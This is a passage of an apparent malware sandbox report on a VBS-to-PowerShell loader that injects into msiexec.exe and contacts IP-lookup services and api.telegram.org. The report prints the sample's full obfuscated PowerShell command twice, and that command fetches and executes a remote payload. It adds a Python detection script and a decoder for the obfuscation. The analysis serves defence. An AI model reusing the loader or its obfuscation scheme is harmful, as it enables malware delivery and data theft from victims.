| PID 4948 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4948 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4948 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
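The WriteProcessMemory rows above give the process chain in PIDs: WScript.exe (1720) starts the 64-bit powershell.exe (2516), and the 32-bit SysWOW64 powershell.exe (4948) writes into msiexec.exe (4364), which was launched with no arguments and is the process the "Blocklisted process makes network request" signature attributes the call-outs to. The Network table shows that process reaching checkip.dyndns.org, reallyfreegeoip.org and api.telegram.org, the external-IP, geolocation and Telegram-bot exfiltration pattern of this keylogger family. The detection below is an added example written for this report, not a rule from the sandbox or any vendor: it runs three checks over constructed telemetry records shaped like Sysmon process-create and network-connect events. PIDs, image paths and destination hosts are taken from this report; the record layout, the parent of WScript.exe (PID 4000) and the 64-bit to 32-bit powershell hop (2516 to 4948) are assumptions made to complete the chain.

```python
"""Detection logic for the process chain and call-outs recorded above.

Added example for this report, not a rule shipped by the sandbox or any
vendor. It runs three checks over constructed telemetry records shaped
like Sysmon process-create and network-connect events. PIDs, image paths
and destination hosts are taken from this report; the record layout, the
parent of WScript.exe and the 64-bit -> 32-bit powershell hop are
assumptions made to build a complete chain.
"""
from __future__ import annotations

import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INJECTION_HOSTS = {"msiexec.exe"}          # bare LOLBIN used as an injection target
SUSPICIOUS_HOSTS = {                       # all three appear in the Network table
    "checkip.dyndns.org": "external IP lookup",
    "reallyfreegeoip.org": "IP geolocation lookup",
    "api.telegram.org": "Telegram Bot API, exfiltration channel",
}

# Constructed records, not a real log export.
EVENTS = [
    {"type": "process", "pid": 1720, "ppid": 4000,   # ppid 4000: assumed explorer.exe
     "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"'},
    {"type": "process", "pid": 2516, "ppid": 1720,   # cmdline omitted; not used by these rules
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "process", "pid": 4948, "ppid": 2516,   # 64-bit -> 32-bit hop: assumed
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "process", "pid": 4364, "ppid": 4948,
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r'"C:\Windows\SysWOW64\msiexec.exe"'},
    {"type": "network", "pid": 4364, "host": "crl.microsoft.com", "dst": "2.18.190.80:80"},
    {"type": "network", "pid": 4364, "host": "checkip.dyndns.org", "dst": "193.122.130.0:80"},
    {"type": "network", "pid": 4364, "host": "reallyfreegeoip.org", "dst": "104.21.67.152:443"},
    {"type": "network", "pid": 4364, "host": "api.telegram.org", "dst": "149.154.167.220:443"},
]


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def has_arguments(image: str, cmdline: str) -> bool:
    """True unless the command line is exactly the image path, quoted or not."""
    return cmdline.strip() not in (image, f'"{image}"')


def detect(events: list[dict]) -> list[tuple[int, str, str]]:
    """Return (pid, rule, detail) triples in event-stream order."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts: list[tuple[int, str, str]] = []
    for e in events:
        if e["type"] == "process":
            parent = procs.get(e["ppid"])
            if parent is None:
                continue
            pname, cname = image_name(parent["image"]), image_name(e["image"])
            # Rule 1: a script host handing off to PowerShell.
            if pname in SCRIPT_HOSTS and cname == "powershell.exe":
                alerts.append((e["pid"], "script_host_to_powershell", f"{pname} -> {cname}"))
            # Rule 2: PowerShell starting a LOLBIN with no arguments (injection host).
            if (pname == "powershell.exe" and cname in INJECTION_HOSTS
                    and not has_arguments(e["image"], e.get("cmdline", ""))):
                alerts.append((e["pid"], "bare_lolbin_from_powershell",
                               f"{cname} started with no arguments"))
        else:
            # Rule 3: that LOLBIN talking to fingerprinting or exfil services.
            proc = procs.get(e["pid"])
            if proc is None or image_name(proc["image"]) not in INJECTION_HOSTS:
                continue
            reason = SUSPICIOUS_HOSTS.get(e["host"].lower())
            if reason:
                alerts.append((e["pid"], "lolbin_callout", f"{e['host']} ({reason})"))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(f"pid {pid:5}  {rule:28}  {detail}")
```

The crl.microsoft.com connection from the same msiexec.exe is deliberately left unflagged: certificate revocation traffic is normal for any signed-code loader, and the signal here is the combination of a bare msiexec.exe started by a 32-bit PowerShell with the three non-Microsoft destinations, not any single connection.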
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. 
nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios 
.tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN 
rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu 
pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. 
nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios 
.tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN 
rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu 
pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
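Every string literal in the command line above is wrapped in a call to Franarrendes, and Forbindingers passes the decoded text to Invoke-Expression (the alias iEx is itself one of the decoded literals, as is User-Agent). The function body on the page fixes the scheme: the loop keeps one character in six, starting at offset 5, and stops one short of the string's end because $Grangerizer is bumped to 1 on every call ($Oplyser is $null + $host.UI, which is non-null). The decoder below is an added example written for this write-up, not code from the sample or from the sandbox report; the literals it decodes are copied from the command line on this page, and the variable names in the SAMPLES dictionary are the sample's own. One caveat for anyone decoding straight from this page: its rendering has collapsed runs of consecutive spaces inside several literals (the User-Agent and the drive.google.com URL among them), so those decode one position off after each collapsed run; take the literals from the sandbox's raw command line or the .vbs rather than from the rendered text. The fourth sample decodes cleanly to $Global:Decarbonylated=$env:appdata+$Kontagis, which with $Kontagis='\Platyhelminthic195.End' is the dropped file listed under Files.

```python
"""Decoder for the Franarrendes string obfuscation used by this sample's
PowerShell stage.  Added example for this write-up; not the sample's code.

The sample's loop is equivalent to

    for($i=5; $i -lt $s.Length-1; $i+=6){ $out += $s[$i] }

i.e. keep s[5], s[11], s[17], ... while the index is below Length-1.
"""
import re

START = 5  # first index kept ($Requestioner=5)
STEP = 6   # stride of the loop ($Requestioner+=6)


def franarrendes(s: str) -> str:
    """Mirror of the sample's Franarrendes: one char in six from offset 5,
    upper bound len-1 (the $Grangerizer adjustment, always 1 per call)."""
    return s[START:len(s) - 1:STEP]


# Literals copied verbatim from the powershell.exe command line above.
SAMPLES = {
    "$Leukophoresis": "V,ticiWoundECi.enxSynon ",
    "$Coleopteroid": "Coff >Disge ",
    "$Regnetegnet": "NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ",
    "first Forbindingers argument": (
        "Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloa"
        "PeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$"
        "RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+"
        "Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum "
    ),
}

# Matches Franarrendes '<literal>' calls.  PowerShell escapes a quote inside
# a single-quoted string as '' ; none of this sample's literals contain one,
# so the simple [^']* body is sufficient here.
LITERAL_RE = re.compile(r"Franarrendes\s+'([^']*)'")


def decode_script(script: str) -> list[str]:
    """Decode every Franarrendes literal in a chunk of the script, in order
    of appearance, so the analyst can read the stage as plain PowerShell."""
    return [franarrendes(m.group(1)) for m in LITERAL_RE.finditer(script)]


# Constructed excerpt: three assignments from the command line above, joined
# the way the one-liner joins them (with semicolons).
EXCERPT = (
    "$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';"
    "$Coleopteroid=Franarrendes 'Coff >Disge ';"
    "$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';"
)

if __name__ == "__main__":
    for name, literal in SAMPLES.items():
        print(f"{name:30} -> {franarrendes(literal)!r}")
    print(decode_script(EXCERPT))
```

PowerShell command names and variable names are case-insensitive, so the mixed-case output (iEx, USEr-AGent, $GloBAl:DecaRboNYlaTEd) runs exactly as the lowercase form would; when hunting for the same family, match on the loop shape (offset 5, stride 6, a length-minus-counter bound) rather than on any decoded string, since the junk characters and variable names change per build.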
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4364 -ip 4364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 1896
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 104.116.69.13.in-addr.arpa | udp |
Files
